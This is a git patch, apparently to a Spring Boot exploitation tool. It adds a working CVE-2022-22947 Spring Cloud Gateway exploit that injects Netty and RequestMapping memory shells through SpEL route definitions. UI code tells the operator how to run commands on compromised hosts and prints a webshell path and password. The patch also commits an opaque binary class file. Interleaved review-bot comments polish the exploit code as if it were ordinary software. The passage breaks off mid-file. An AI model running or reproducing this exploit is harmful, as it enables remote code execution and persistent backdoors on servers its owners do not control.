From e9dcb1b3e4ea55f753e2a6b4e0078bb01a3ae8cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= Date: 2022年4月17日 21:26:15 +0800 Subject: [PATCH 1/8] =?UTF-8?q?=E6=9B=B4=E6=96=B01.3=E7=89=88=E6=9C=AC?= =?UTF-8?q?=EF=BC=8C=E6=94=AF=E6=8C=81SpringCloudGatewayRCE?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .github/workflows/maven.yml | 61 +++++++ pom.xml | 2 +- .../drops/exp/SpringCloudGatewayRCEEXP.java | 65 +++++++ .../java/com/drops/main/AttackService.java | 15 +- .../com/drops/poc/SpringBootInfoCheck.java | 9 +- .../drops/poc/SpringCloudGatewayRCEPOC.java | 63 +++++++ .../java/com/drops/ui/MainController.java | 18 +- src/main/java/com/drops/utils/HTTPUtils.java | 15 ++ .../java/com/drops/utils/StringRandom.java | 30 ++++ src/test/java/0cat.class | Bin 0 -> 9364 bytes src/test/java/Client.java | 32 ++++ src/test/java/LdapClient.java | 170 ++++++++++++++++++ src/test/java/gateway.java | 37 ++++ src/test/java/spel.java | 31 ++++ 14 files changed, 537 insertions(+), 11 deletions(-) create mode 100644 .github/workflows/maven.yml create mode 100644 src/main/java/com/drops/exp/SpringCloudGatewayRCEEXP.java create mode 100644 src/main/java/com/drops/poc/SpringCloudGatewayRCEPOC.java create mode 100644 src/main/java/com/drops/utils/StringRandom.java create mode 100644 src/test/java/0cat.class create mode 100644 src/test/java/Client.java create mode 100644 src/test/java/LdapClient.java create mode 100644 src/test/java/gateway.java create mode 100644 src/test/java/spel.java diff --git a/.github/workflows/maven.yml b/.github/workflows/maven.yml new file mode 100644 index 0000000..c0438c9 --- /dev/null +++ b/.github/workflows/maven.yml 
@@ -0,0 +1,61 @@ +name: Release Maven + + + +on: + push: + tags: + - '*' +#on: [push] + + + +jobs: + build: + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v2 + - name: Set up JDK 1.8 + uses: actions/setup-java@v1 + with: + distribution: "Liberica" + java-version: 1.8 + java-package: jdk+fx + - name: Build with Maven + run: + mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V + - name: Create Release + id: create_release + uses: SummerSec/create-release@master + with: + tag_name: ${{ github.ref }} + release-name: Release ${{ github.ref }} + draft: false + prerelease: false + env: + GITHUB_TOKEN: ${{ secrets.RELEASE }} + + + - name: Upload a Build Artifact + id: upload-build-artifact + uses: actions/upload-artifact@v2.3.1 + with: + # Artifact name + name: # optional, default is artifact + SPATool-${{steps.create_release.outputs.tag}}-SNAPSHOT-all.jar + # A file, directory or wildcard pattern that describes what to upload + path: + target/*-SNAPSHOT-all.jar + # The desired behavior if no files are found using the provided path. + + - name: Auto Upload Release + id: upload-release-asset + uses: actions/upload-release-asset@v1.0.1 + env: + GITHUB_TOKEN: ${{secrets.RELEASE}} + with: + upload_url: ${{ steps.create_release.outputs.upload_url }} + asset_path: /home/runner/work/SPATool/SPATool/target/SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar + asset_name: SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar + asset_content_type: application/java-archive diff --git a/pom.xml b/pom.xml index cd3a18b..9d6fb69 100644 --- a/pom.xml +++ b/pom.xml @@ -7,7 +7,7 @@ org.example SpringBootExploit - 1.2-SNAPSHOT + 1.3-SNAPSHOT diff --git a/src/main/java/com/drops/exp/SpringCloudGatewayRCEEXP.java b/src/main/java/com/drops/exp/SpringCloudGatewayRCEEXP.java new file mode 100644 index 0000000..622d60e --- /dev/null +++ b/src/main/java/com/drops/exp/SpringCloudGatewayRCEEXP.java 
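Review bot: `uses: SummerSec/create-release@master` in the Create Release step pins a third-party action to a mutable branch, so whatever is pushed to that branch later runs in this workflow with `secrets.RELEASE` on every tag push; pin it to a full commit SHA, e.g. `uses: SummerSec/create-release@<commit-sha-placeholder>`, and pin `actions/checkout@v2`, `actions/setup-java@v1`, `actions/upload-artifact@v2.3.1` and `actions/upload-release-asset@v1.0.1` the same way. `secrets.RELEASE` is presumably a personal access token standing in for the workflow's built-in `GITHUB_TOKEN`; if so, a comment on the `env:` line stating which scopes it needs would let a maintainer verify it is not broader than release creation requires. The artifact `name:` and `path:` values are given on continuation lines after a trailing comment, which parses but reads as if the keys were empty; put each value on the key's own line.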
@@ -0,0 +1,65 @@ +package com.drops.exp; + +import com.drops.utils.HTTPUtils; +import com.drops.utils.StringRandom; + +/** + * @ClassName: SpringCloudGatewayRCEEXP + * @Description: TODO + * @Author: Summer + * @Date: 2022年4月17日 19:56 + * @Version: v1.0.0 + * @Description: 参考 https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/ + **/ +public class SpringCloudGatewayRCEEXP { + final static String mem = "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"; + + + final static String mem1 = "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"; + + final static String NettyMemshell = String.format("#{T(org.springframework.cglib.core.ReflectUtils).defineClass('NettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}", mem); + + final static String SpringRequestMappingMemshell = String.format("#{T(org.springframework.cglib.core.ReflectUtils).defineClass('SpringRequestMappingMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping)}",mem1); + + + public boolean execute(String target, String type){ + String endpoint = "s" + StringRandom.getRandomString(5); + String body = String.format("{\n" + + " \"id\": \"%s\",\n" + + " \"filters\": [{\n" + + " \"name\": \"AddResponseHeader\",\n" + + " \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" + + " }],\n" + + " \"uri\": \"%s\",\n" + + " \"order\": 0\n" + + "}", endpoint, type, target); + + HTTPUtils.postRequestjson(target , "actuator/gateway/routes/" + endpoint, body).toString(); + HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString(); + HTTPUtils.getRequest(target , "actuator/gateway/routes/" + endpoint).toString(); + 
HTTPUtils.deleteRequest(target , "actuator/gateway/routes/" + endpoint).toString(); + HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString(); + String header = "X-CMD: echo "+ endpoint; + + String re6 = HTTPUtils.postRequestV1(target, "?cmd=echo "+ endpoint, header).toString(); +// System.out.println("re6 = " + re6); + if (re6.toLowerCase().contains(endpoint)){ +// System.out.println(String.format("[+] %s inject success", type)); + return true; + } + return false; + } + + public boolean exp(String target){ + + if (execute(target,NettyMemshell)){ + System.out.println("[+] NettyMemshell inject success"); + return true; + }else if (execute(target,SpringRequestMappingMemshell)){ + System.out.println("[+] SpringRequestMappingMemshell inject success"); + return true; + } + return false; + } + +} diff --git a/src/main/java/com/drops/main/AttackService.java b/src/main/java/com/drops/main/AttackService.java index acc9b12..360ecfe 100644 --- a/src/main/java/com/drops/main/AttackService.java +++ b/src/main/java/com/drops/main/AttackService.java @@ -96,7 +96,19 @@ public boolean gadgetSend(String target, String vps, String gadget, String[] por } } + if (gadget.equalsIgnoreCase("SpringCloudGatewayRCE")){ + System.out.println("SpringCloudGatewayRCE " + System.currentTimeMillis()); + try { + SpringCloudGatewayRCEEXP exp = new SpringCloudGatewayRCEEXP(); + return exp.exp(target); + }catch (Exception e){ + e.printStackTrace(); + } + } + + }catch (Exception e){ + e.printStackTrace(); return false; } @@ -104,8 +116,5 @@ public boolean gadgetSend(String target, String vps, String gadget, String[] por } - public void setPOCRequest(String target, String vps, String gadget,String echo){ - - } } diff --git a/src/main/java/com/drops/poc/SpringBootInfoCheck.java b/src/main/java/com/drops/poc/SpringBootInfoCheck.java index caf9bd8..635d651 100644 --- a/src/main/java/com/drops/poc/SpringBootInfoCheck.java +++ b/src/main/java/com/drops/poc/SpringBootInfoCheck.java 
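Review bot: The class Javadoc of `SpringCloudGatewayRCEEXP` still carries the `@Description: TODO` placeholder and then a second `@Description` tag; collapse them into one sentence stating that `exp` returns `true` when `execute` reports success for either payload and `false` otherwise. Inside `execute`, every `HTTPUtils.…(…).toString()` whose result is discarded is a dead expression — only `re6` is read — so drop the trailing `.toString()` on those five statements and keep just the calls. The commented-out `System.out.println` lines should be deleted rather than left in place.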
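Review bot: The new `SpringCloudGatewayRCE` branch in `gadgetSend` wraps `exp.exp(target)` in its own try/catch that only prints the stack trace and then falls out of the `if` without returning, so on an exception the method's result depends on whatever follows the enclosing try block beyond this hunk; the enclosing `catch (Exception e)` already returns `false`, so the inner try/catch is redundant — remove it, or add `return false;` after `e.printStackTrace();`. `System.out.println("SpringCloudGatewayRCE " + System.currentTimeMillis());` looks like leftover debugging; the other gadget branches' logging style is not visible here, so match whatever they use. `gadgetSend` starts outside the hunk.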
@@ -108,11 +108,14 @@ void checkEnvPointV1(String addr){ JolokiaLogbackRCEPOC logbackRCEPOC = new JolokiaLogbackRCEPOC(); JolokiaRealmJNDIRCEPOC realmJNDIRCEPOC = new JolokiaRealmJNDIRCEPOC(); logbackRCEPOC.hasJolokiaLogbackRCE(url); - Boolean f = realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url); + boolean f = realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url); if(!f){ H2DatabaseConsoleJNDIRCEPOC h2 = new H2DatabaseConsoleJNDIRCEPOC(); if (!h2.hasH2DatabaseConsoleJNDIRCE(url)){ + SpringCloudGatewayRCEPOC gatewayRCEPOC = new SpringCloudGatewayRCEPOC(); + if (!gatewayRCEPOC.hasSpringCloudGatewayRCEPOC(addr)){ + } } } @@ -133,10 +136,12 @@ void checkEnvPointV2(String addr){ JolokiaLogbackRCEPOC logbackRCEPOC = new JolokiaLogbackRCEPOC(); JolokiaRealmJNDIRCEPOC realmJNDIRCEPOC = new JolokiaRealmJNDIRCEPOC(); if(!logbackRCEPOC.hasJolokiaLogbackRCE(url) || realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url)){ - H2DatabaseConsoleJNDIRCEPOC h2 = new H2DatabaseConsoleJNDIRCEPOC(); if (!h2.hasH2DatabaseConsoleJNDIRCE(url)){ + SpringCloudGatewayRCEPOC gatewayRCEPOC = new SpringCloudGatewayRCEPOC(); + if (!gatewayRCEPOC.hasSpringCloudGatewayRCEPOC(addr)){ + } } } diff --git a/src/main/java/com/drops/poc/SpringCloudGatewayRCEPOC.java b/src/main/java/com/drops/poc/SpringCloudGatewayRCEPOC.java new file mode 100644 index 0000000..0b60167 --- /dev/null +++ b/src/main/java/com/drops/poc/SpringCloudGatewayRCEPOC.java 
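Review bot: `if (!gatewayRCEPOC.hasSpringCloudGatewayRCEPOC(addr)){ }` in `checkEnvPointV1` has an empty body, so the `if` only obscures that the call is made for its side effect; write it as the plain statement `gatewayRCEPOC.hasSpringCloudGatewayRCEPOC(addr);` (the second hunk, in `checkEnvPointV2`, has the same empty `if`). The sibling checks in both methods receive `url` while the new one receives `addr`; if `url` is a normalized form of `addr` built earlier in the method, the new check skips that normalization — worth confirming against the lines above the hunk. Both enclosing methods start outside the hunks.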
@@ -0,0 +1,63 @@ +package com.drops.poc; + +import com.drops.entity.ControllersFactory; +import com.drops.ui.MainController; +import com.drops.utils.HTTPUtils; +import com.drops.utils.StringRandom; +import com.drops.utils.Utils; + +import java.util.Locale; + +/** + * @ClassName: SpringCloudGatwayRCEPOC + * @Description: TODO + * @Author: Summer + * @Date: 2022年4月17日 16:55 + * @Version: v1.0.0 + * @Description: + CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE + **/ +public class SpringCloudGatewayRCEPOC { + + private final MainController mainController; + + public SpringCloudGatewayRCEPOC( ) { + this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName()); + + } + + public boolean hasSpringCloudGatewayRCEPOC(String target) { + String endpoint = "s" + StringRandom.getRandomString(5); + String body = String.format("{\n" + + " \"id\": \"%s\",\n" + + " \"filters\": [{\n" + + " \"name\": \"AddResponseHeader\",\n" + + " \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" + + " }],\n" + + " \"uri\": \"%s\",\n" + + " \"order\": 0\n" + + "}", endpoint, endpoint, target); + + String re1 = HTTPUtils.postRequestjson(target , "actuator/gateway/routes/" + endpoint, body).toString(); + String re2 = HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString(); + String re3 = HTTPUtils.getRequest(target , "actuator/gateway/routes/" + endpoint).toString(); + System.out.println("re1 = " + re1); + System.out.println("re2 = " + re2); + System.out.println("re3 = " + re3); + if (re3.toLowerCase().contains(endpoint.toLowerCase())) { + this.mainController.logTextArea.appendText(Utils.log("存在SpringCloudGatewayRCEPOC漏洞\n")); + return true; + }else { + this.mainController.logTextArea.appendText(Utils.log("不存在SpringCloudGatewayRCEPOC漏洞\n")); + } + HTTPUtils.deleteRequest(target , "actuator/gateway/routes/" + endpoint); + HTTPUtils.postRequestV1(target , "actuator/gateway/refresh"); + return false; + } + + + + + + +} 
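Review bot: The three `System.out.println("re1 = " + re1)` … `re3` lines in `hasSpringCloudGatewayRCEPOC` dump full HTTP responses to stdout, bypassing the `logTextArea` logging the rest of the method uses; remove them or route them through `Utils.log`. `import java.util.Locale;` is unused, the class Javadoc still has the `@Description: TODO` placeholder, and `@ClassName: SpringCloudGatwayRCEPOC` misspells the class. The constructor's cast of `ControllersFactory.controllers.get(...)` to `MainController` will surface as a `NullPointerException` at `appendText` if the controller was never registered; `this.mainController = Objects.requireNonNull((MainController) ..., "MainController not registered");` fails earlier with a clearer message.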
diff --git a/src/main/java/com/drops/ui/MainController.java b/src/main/java/com/drops/ui/MainController.java index 2eb5be4..fed9766 100644 --- a/src/main/java/com/drops/ui/MainController.java +++ b/src/main/java/com/drops/ui/MainController.java @@ -124,7 +124,7 @@ private void initConnect() { private void initComBoBox() { - ObservableList gadgets = FXCollections.observableArrayList(new String[]{ "SnakeYAMLRCE", "SpELRCE", "EurekaXstreamRCE", "JolokiaLogbackRCE", "JolokiaRealmRCE", "H2DatabaseConsoleJNDIRCE"}); + ObservableList gadgets = FXCollections.observableArrayList(new String[]{ "SnakeYAMLRCE", "SpELRCE", "EurekaXstreamRCE", "JolokiaLogbackRCE", "JolokiaRealmRCE", "H2DatabaseConsoleJNDIRCE", "SpringCloudGatewayRCE"}); this.gadgetOpt.setPromptText("SnakeYAMLRCE"); this.gadgetOpt.setValue("SnakeYAMLRCE"); this.gadgetOpt.setItems(gadgets); 
@@ -303,11 +303,19 @@ public void crackSpcGadgetBtn(ActionEvent actionEvent) { boolean flag = this.attackService.gadgetSend(this.targetAddress.getText(), this.vps.getText(),this.gadgetOpt.getValue(),this.getPorts()); if(flag){ - if (HTTPUtils.getRequest(String.valueOf(this.targetAddress.getText()),"ateam").isOk()){ - this.logTextArea.appendText(Utils.log(" 冰蝎内存马注入成功 !")); - this.logTextArea.appendText(Utils.log( " /ateam 密码:ateamnb")); + System.out.println(this.gadgetOpt.getValue()); + if (this.gadgetOpt.getValue().equalsIgnoreCase("SpringCloudGatewayRCE")){ + this.logTextArea.appendText(Utils.log(" SpringCloudGateway 漏洞利用成功")); + this.logTextArea.appendText(Utils.log(" 请自行检查是NettyMemshell 还是 SpringRequestMappingMemshell!")); + this.logTextArea.appendText(Utils.log(" 如果是SpringRequestMappingMemshell,/?cmd={cmd} 执行命令")); + this.logTextArea.appendText(Utils.log(" 如果是NettyMemshell,header头 X-CMD: {cmd} 执行命令")); }else { - this.logTextArea.appendText(Utils.log("漏洞利用失败!\t")); + if (HTTPUtils.getRequest(String.valueOf(this.targetAddress.getText()),"ateam").isOk()){ + this.logTextArea.appendText(Utils.log(" 冰蝎内存马注入成功 !")); + this.logTextArea.appendText(Utils.log( " /ateam 密码:ateamnb")); + }else { + this.logTextArea.appendText(Utils.log("漏洞利用失败!\t")); + } } }else { this.logTextArea.appendText(Utils.log("漏洞利用失败!\t")); diff --git a/src/main/java/com/drops/utils/HTTPUtils.java b/src/main/java/com/drops/utils/HTTPUtils.java index edec81f..e2bed3c 100644 --- a/src/main/java/com/drops/utils/HTTPUtils.java +++ b/src/main/java/com/drops/utils/HTTPUtils.java 
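Review bot: `System.out.println(this.gadgetOpt.getValue());` at the top of the new branch in `crackSpcGadgetBtn` is a leftover debug print in UI code; remove it. The gadget name `"SpringCloudGatewayRCE"` is now spelled out as a literal here, in the `initComBoBox` list and in `AttackService.gadgetSend`, so a shared `static final String` constant would keep the three in step, and comparing as `"SpringCloudGatewayRCE".equalsIgnoreCase(this.gadgetOpt.getValue())` avoids an NPE when nothing is selected. The nested `else { if (...) {...} else {...} }` would read more plainly as `else if`. `crackSpcGadgetBtn` starts outside the hunk.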
@@ -33,6 +33,21 @@ public HTTPUtils(int Timeout){ HttpGlobalConfig.setTimeout(Timeout); } + public static HttpResponse deleteRequest(String target, String s) { + String url = URLUtil.normalizeURL(target); + Proxy proxy = (Proxy) MainController.currentProxy.get("proxy"); + HttpResponse result = null; + if (proxy == null){ + result = HttpRequest.delete(url).execute(); + }else { + result = HttpRequest.delete(url).setProxy(proxy).execute(); + } + + return result; + } + + + public void setTimeout(int Timeout){ HttpGlobalConfig.setTimeout(Timeout); } diff --git a/src/main/java/com/drops/utils/StringRandom.java b/src/main/java/com/drops/utils/StringRandom.java new file mode 100644 index 0000000..d344e92 --- /dev/null +++ b/src/main/java/com/drops/utils/StringRandom.java @@ -0,0 +1,30 @@ +package com.drops.utils; + +/** + * @ClassName: StringRandom + * @Description: TODO + * @Author: Summer + * @Date: 2022年4月17日 19:43 + * @Version: v1.0.0 + * @Description: + **/ +public class StringRandom { + + /** + * @Description: 获取随机字符串 + * @Param: [length] + * @return: java.lang.String + * + */ + public static String getRandomString(int length) { + String base = "abcdefghijklmnopqrstuvwxyz0123456789"; + int size = base.length(); + StringBuilder sb = new StringBuilder(); + for (int i = 0; i < length; i++) { + int number = (int) (Math.random() * size); + sb.append(base.charAt(number)); + } + return sb.toString(); + } + +} 
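Review bot: `deleteRequest(String target, String s)` never uses its second parameter: the URL is built from `target` alone, so the request always goes to the normalized base URL regardless of the path the callers pass as `s` — either append it the way the sibling request helpers do (not visible in this hunk) or remove the parameter so the mismatch is explicit. `result` does not need the `null` initializer; `HttpResponse result = proxy == null ? HttpRequest.delete(url).execute() : HttpRequest.delete(url).setProxy(proxy).execute();` says the same in one line. A Javadoc line noting that the proxy is read from `MainController.currentProxy` would help, since that static coupling to the UI class is not visible from the signature.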
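Review bot: `getRandomString` draws each character with `(int) (Math.random() * size)`; `int number = ThreadLocalRandom.current().nextInt(size);` yields the uniform index directly without the double cast or the shared `Math.random` generator. `base` is recreated on every call and could be a `private static final String`, and the class Javadoc still carries the `@Description: TODO` placeholder — replace it with a one-line statement that the method returns `length` lowercase alphanumerics and an empty string for `length <= 0`. `StringRandom` is a utility class and should get a private constructor.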
diff --git a/src/test/java/0cat.class b/src/test/java/0cat.class new file mode 100644 index 0000000000000000000000000000000000000000..5e6976b8f12627733e45d9ed30a89bb8b0af7f7a GIT binary patch literal 9364 zcmb7J3w%`Nl|Lu*xHprV1O@^Os33xb$zym66GRgT5={ao0Ss91X67atn9K|_6OvFL zwOFlHYpu4{_oFISZ3UGH5ua_$>aiy6<;)ysr|;?xk+q`@tdqn@onkadr33 zzVn@PzVrB>^IhKhpY{3R`X0jQYD_M1l=r9@NA9e_~=|g8Ni+A`e+u<6hoi5;tekvo{!juv&3b- zxGeBd1E1}qb-YlcCpA7t<3&0z76a$%yhp(_@wimuppr>~R_8jMt`tM{J`V9Raapd@ z)k2vSWxSGC>AYIwH5#9%@mihNm2#LH1l4*mdwwZz;0t_wAvbE=R7S7yMx8eacFltQ zGC{pr=ZkdSqSFgHw+Opjtn(#eBdt2O2|4W=Z}rh0`nZg@@ufO_q;p3ZcXF4`+kL!) zcWQi@k9xUVyzJ6=x8Q#{j6|Q5@n?9CkN5Hw!e*u*=n+p5K@t_Fu!N*uo%?j|*XTB# zV><8cdb4vsjr%;tv~^(6%4c_awc*zxn!}-tl|c4^vz4nlhwk`}oq#y>P=pOkdfLjQ zl8KDPRQ;)o6eU)bL^4c%Ngs-viM~*0HXTd!VaBy>D9Yqcnc03O@A_CGmfe8S>ZLm{ zx-l7roXXZ%!fGEJ=&{mWW=|X={?=r~jPEehG4XB>y0iT;DP=g+Wc9}qQ7gSU7SCE~ zNSUj2RkAn6%}k~>X@a0Zh~Ws+Y=>^ndCc}PRaNh9T3Sp2w%miQ?QVj;1JTt?=Q^d> zJ9I89Y+4xqOvNu_MF!Kc>`181%4EzwYg4Qb9ud5;7gySXbILojW@LYxnUWhttRc5x zE4ajrgQ&_Wb!*Q)E0S$kx(f_os49oj&BGBZm5n76!s^MMeG?sGF9hG@U^X=fv2z@2 zmF7)@y}i<$o~+ro7oz3elr2e9kl2whl$p+0;b^|cgj1tt)?}ko+rhpd+!kklhym4k zcT7rm2%QnFOaaGC+UkvCx1r53D;@;}VpGQR3P=%Q3g=kEOr>Ttsv?1DX7!W~F?waB zz{XN{cfuTi^*DxK3$#(Qa6>xVW@Y=6h}gMP=%MDINNIr`Q$;UAQHck87|mCh#ETJ0 zCbHIWR&D_vF;l5{EMf{bZB#Q%b*;&CU&u_Ek$x+LIWrzhn4w5AZG{>qkwbcACTk|5 zW;$Bn5Ij8xY|2TC}mER#)3y);e&IyQ~KMlocL(UM45Y3U>j8wyIh zj3bHKxpVy@dnrU!*mzS=^sJ)QHvHK0Sm9OrFwH8WRC0v+ilSY5&^4F_)TMxS8Xw3* zc~avvYJny)%vZElS6XiM63#)IEc)qc0eA zC0%9E)pQMvxV>w0-CBb_N7phoSI$>7iOmDpd~CiD+i8GJQgWANwrT7y5&hYh}tzW^i>l0yTid!eRSUkgy6 z&q^D7J*en9zQN!x@{I<6ieo0=l2q2slbw|aidhh7lrs2cy4|3!((oo!ayakrh1k%f zZiCS0%Jp>sCxJJp@B?v!Z{aT+d@C;WEInuNSNJxR!pTfxanwqzZ0_jT+7S+g76{U> zLPfFYcD_U7uNnMx!Rt;KlD{D?ck$f@-^2GZEfx&N5y25*ve~es8|CxU=<tZadG<@lz?qw^xjkm2>3533RcWH9(4ewe9DE>{u_ z{w6;H05SMce3ドルz_{J6p2;wJzs20zJ9A=VHD!m3O)e*jdYgE}pB5iG+vQ<2j)y>o9= zk&#H;YC`@Yb|rjk{B483!%rK0l#ju?{EWuW8vGm|*EnbJD4&?HdlfAPkMZ-^dao>o 
zP8ドルW)_#{7Q@C*DjQwS>5t1?udO%9+E)e8mcqgE!8jseKh^+Q%qy~;xX1=AwOihSV$ zc`BY9agvq8)@qeNZG&IrmtfP*!AJxsW$?@N9NGy*u)vI`Ei*c@z#2wD!sILbDhjmp zqqN2rGt&>*z$Jsf%ilwW0I7xy{yx8k1ZZsT)cAFgkZ%BSWEkZ^IFqs>p-wA;mg^F0 zq!Vu<4}w0lfzot_s<^2%_$~e+kkh__`5ldawbni42kq<(cxd^?kqzxbbgrkx<)0aj z58Z3E&ghmXVUs zbaF`b^HWPIWUtEi!r`Q-=%FW^sHobLthP*NO`LOpk6i%ErLy_rmIvEdGSsrQ0Jf9Z z*eW;(%Ayt;Jxh84w!wj+rN!B5$_W(Hc~aceUB5z|mIN|55kV?1pQ?naVmvhi@Yj(` zO(R*+in*(oihApfTZuk#y27Cf&8&AYg$^9tHKik3a&J@~I`B~4f`bl5^lVZ=g6QKX z>_ZJhP-$kcCnHaBi0kT!n;j>DHd~OdqI#g&%gW$MWV=REP+-Er#a<$w&lh6hx4;j4 z@Yb9_JAtDjltXW9CD3};p582uvt{A1QuqHPmqku&3_9<`kxb}3jayh2jz!^>)t&&A z3gn5y0N<1#!o4>>n1RW0o=FN&7GAMKV@95()HNR#S}fC;PMhdf;3XX1wBBS|wXlmn zMg2U7=@0>ch?{9En$NZir&#Mecd50`FrApM*rzv^IGEgzEv3ドル$vJY%dUiOfanLPyb zbm(RuEI!REc}4PPyK)3Yqbvw9`3b;Xy-UQ33!IA%-oH-~VWeUlTVOk694;qPzz9`X zHW?|I);MjFkKifWQYXTK;lin^d7+S_@`?m4@9b*q=xS-dXz#X;=545^Q=Z}`t^#it zEQK#RPStFaDCm%Jmp2kj*yW_OH!ZoGVg25bo06@qVq zPX}yPHNc9hIS{G?(xe$!Ms$_pJ0qZ1d<96dazwiy4mhnpoisnwwqin^b->IrCQIx` z?nd@^p>~1Of{DGyg;um_AD$TyX%!w|N4ドルP z6}k=crQ(!qvw8xoT%cXat$yPKmABOfb5!BNr7}m;PSW&lcWsXRqcmgMv>eTJiECBs z5puWH90iLKs-tBPKrW%cyffstLDa0J*|ZMMZGdgp!(QiO#RYUB{XIzkW2R(u(xAf6D_ZrB zd5%`xMGI?Qp_TY+3)Z?;yh5u)+Sa=9v>Lg4gpT{yoS^eC>0j%5k=ErXT!VW~umsVfQhZX(^c$h5NGjnv}zRlzu@U6x`W^Vy-z z;L`0_wG-)b864J)^>J|6MHcPG)8*i_2WH<3q`lx{yr;i6^ecmdebw7yc?xbkmhsh= z=uapiU3@w6+z&u|f}VsELrA};=-YU@7Ej-yr=jQVfVrcP&(VGoDB9M(9jbGTFlkiXgCtbhkY zaMk9pH{hK-DaJ5+QCRbD@wbR|dO#OW4(I{x8M-(}m(8$bYE{wvMnb;KS<9fg>d0NVI;ZV$%gS94_;3N6?1Lj*t;H{5#}x zKodIc%r7?rMnEe>vPgh%xob^DRYjourH83GP+nEBB3v0L^Izs%QCV2AH9Rda4d~K+ z7x@Kopxm{h6PG|`=XDi)d9OhszwJWkr zfYDJ@nF{E4l*Z_J?EM{RbQ0NB27M0D3m7w?)gF2gT+1PErsU_NMchL#$vj)ad+B9J z^HPv6r&j^c8r5+(eGjubY`=rPPd`8gBRTBc^YJx+>9>$T246)#q_>eo(|H)O1vJm* zH2nxq3Yrg-ehOwXWCp&g(T^20YxEP1eyY*WzryW!E6?ZiU(^!q-qa z)IAE{9)lmBL1XwVBKkQ{8a)^rtYBc=|K?bI32l%8%$TV8)rqj0fm1!9gJJe9<1=n?z%p zztZThHToNk{#K*ElTPtU+k3(4@97`F8ee0T_32koL)7~Le^yl1TK^zGZe6#_zqK<* 
z9q3sO;Ju;SRfAU)*@O5y+U6euZF`-6*hV9^fhb=!N1QwY?#UeF?t)ZPu<2z=l5o-u z;=TqkUyEp8fd*wWy)Nx0+7mCDL{+g?05!yu3-e3ppOKGltY|D$r-6bk2k2jr1FD5Y zC%j)29%mT-lK#~;#A?VFmge#EfNGuJmI|oWnG1{=iTx`u&NCBM{rAG*qed{AirKr8 cnL0$|nU&CgNZJ2MZ{Y63!q+%KuX{`X4+rI^wg3PC literal 0 HcmV?d00001 diff --git a/src/test/java/Client.java b/src/test/java/Client.java new file mode 100644 index 0000000..982423b --- /dev/null +++ b/src/test/java/Client.java @@ -0,0 +1,32 @@ +/** + * @ClassName: Client + * @Description: TODO + * @Author: Summer + * @Date: 2021/8/2 10:53 + * @Version: v1.0.0 + * @Description: + **/ +import java.io.IOException; +import java.net.Socket; +import java.net.UnknownHostException; +import java.util.Hashtable; + +import javax.naming.Context; +import javax.naming.NamingEnumeration; +import javax.naming.directory.Attribute; +import javax.naming.directory.Attributes; +import javax.naming.directory.DirContext; +import javax.naming.directory.InitialDirContext; +import javax.naming.directory.SearchControls; +import javax.naming.directory.SearchResult; + +public class Client { +// public static void main(String[] args) { +// demo d = new demo(); +// d.setDemo(); +// if (d.isFlag()){ +// System.out.println("sad"); +// } +// } +} + diff --git a/src/test/java/LdapClient.java b/src/test/java/LdapClient.java new file mode 100644 index 0000000..676615a --- /dev/null +++ b/src/test/java/LdapClient.java 
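Review bot: `Client` contains only a commented-out `main` and twelve unused imports, so it adds nothing to the test sources; either drop the file from the commit or restore it as a real test with the imports trimmed to what it uses. The header Javadoc also keeps the `@Description: TODO` placeholder and a duplicated `@Description` tag.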
@@ -0,0 +1,170 @@ +/** + * @ClassName: LdapClient + * @Description: TODO + * @Author: Summer + * @Date: 2021/8/2 11:00 + * @Version: v1.0.0 + * @Description: + **/ +import java.util.Properties; +import javax.naming.NamingException; +import javax.naming.NamingEnumeration; +import javax.naming.directory.*; +import javax.naming.ldap.*; + +/** + * Created by baikai on 8/17/16. + */ +public class LdapClient { + + private String ldapUrl; + private String ldapUserDN; + private String ldapPwd; + + public LdapClient(String ldapUrl, String ldapUserDN, String ldapPwd){ + this.ldapUrl = ldapUrl; + this.ldapUserDN = ldapUserDN; + this.ldapPwd = ldapPwd; + } + + /** + * Create LDAP user + * @param userName + * @param password + * @param uidNumber + * @param gidNumber + */ + public void createLDAPUser(String userName, String password, String uidNumber, String gidNumber){ + LdapContext context = this.initLDAPContext(); + Attributes matchAttrs = new BasicAttributes(true); + BasicAttribute objclassSet = new BasicAttribute("objectClass"); + objclassSet.add("account"); + objclassSet.add("posixAccount"); + matchAttrs.put(objclassSet); + matchAttrs.put(new BasicAttribute("uid", userName)); + matchAttrs.put(new BasicAttribute("cn", userName)); + matchAttrs.put(new BasicAttribute("uidNumber", uidNumber)); + matchAttrs.put(new BasicAttribute("gidNumber", gidNumber)); + matchAttrs.put(new BasicAttribute("homeDirectory", "/home/" + userName)); + matchAttrs.put(new BasicAttribute("userpassword", password)); + matchAttrs.put(new BasicAttribute("description", "LDAP user.")); + + try { + context.bind("uid=" + userName + ",ou=People,dc=asiainfo,dc=com", null, matchAttrs); + } catch (NamingException e) { + e.printStackTrace(); + }finally { + this.closeLdapContext(context); + } + } + + /** + * Create LDAP user group + * @param groupName + * @param password + * @param gidNumber + */ + public void createLDAPUserGroup(String groupName, String password, String gidNumber){ + LdapContext context = 
